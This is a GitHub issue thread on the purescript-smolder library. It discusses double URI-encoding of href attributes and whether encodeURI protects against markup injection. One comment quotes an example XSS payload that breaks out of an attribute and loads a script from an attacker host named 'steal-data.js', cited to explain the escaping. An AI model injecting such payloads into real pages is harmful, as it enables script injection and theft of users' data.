### ISSUE TITLE
URI-encoding hrefs seems unexpected

### ISSUE THREAD

**Issue by mjhoy** [bodil/purescript-smolder#39]
The fact that

```haskell
render $ a ! href "some%20string" $ text "inner"
```

produces

```html
<a href="some%2520string">Inner</a>
```

rather than

```html
<a href="some%20string">Inner</a>
```

Seems a bit unexpected. I ran into an issue with using Pux, as the react renderer won't `encodeURI` href props, but attempting to render the same markup to a string caused this double encoding issue.

Is this expected behavior?

(Related: #31)

**Comment by paluh** [comment]
I want to second this question.
@coot What is the expected form of an url which I should pass to `href` - lets say that I have this url:

`http://example.com?key1=some%20value&email=email%40example.com`

Should I decode this before putting it into `href`? I'm not sure if this will be correct uri then and if it won't mess up something.

**Comment by paluh** [comment]
It seems that my problem with `href` is due to `encodeURI` behavior. This:

`http://example.com?key1=some%20value&email=email%40example.com`

is encoded by this value:

```javascript
> encodeURI("http://example.com?key1=some%20value&email=email%40example.com")
"http://example.com?key1=some%2520value&email=email%2540example.com"
```

And it is not a correct URL anymore... Is it desired behavior?

**Comment by paluh** [comment]
Why do we use `encodeURI` in case of "url attrs"?

**Comment by coot** [comment]
For security reasons, you don't want that somebody puts a nasty script tag due to xml-injection.  You can use `decodeURI` first and then smolder will encode it with `encodeURI`.  This way you should be safe, even if a string decodes to `"\><script src="https://attacker.com/steal-data.js"></script>`.

**Comment by paluh** [comment]
Won't HTML escaping be enough in this case instead of uri encoding?

**Comment by paluh** [comment]
I don't think that passing an "unsafe string" to `decodeURI` and then passing it to `href` function which runs `encodeURI` makes this value safe URL and prevents xml-injection. As you have pointed out we really want to prevent "unsafe string" to insert `HTML` tags  and this won't work in this case. Am I missing the point?

**Comment by coot** [comment]
This looks fine, no?
```
node
> encodeURI(decodeURI("<script src='hello.js'></script>"))
'%3Cscript%20src=\'hello.js\'%3E%3C/script%3E'
```

**Comment by paluh** [comment]
I mean won't it be enough to just HTML escape these values?

**Comment by paluh** [comment]
@coot It seems that you are right:

https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.md#rule-5---url-escape-before-inserting-untrusted-data-into-html-url-parameter-values

On the other hand escaping all attributes is a __huge__ performance penalty. I want to add to `Smolder.Markup`:

``` purescript
data AttrValue = Safe String | Unsafe String
```
What do you think?

**Comment by paluh** [comment]
P.S.
I'm also considering cloning `Smolder.HTML.Attributes` to `Smolder.HTML.Attributes.Unsafe` because from my experience attributes values which are untrusted are really rare in real live setting.
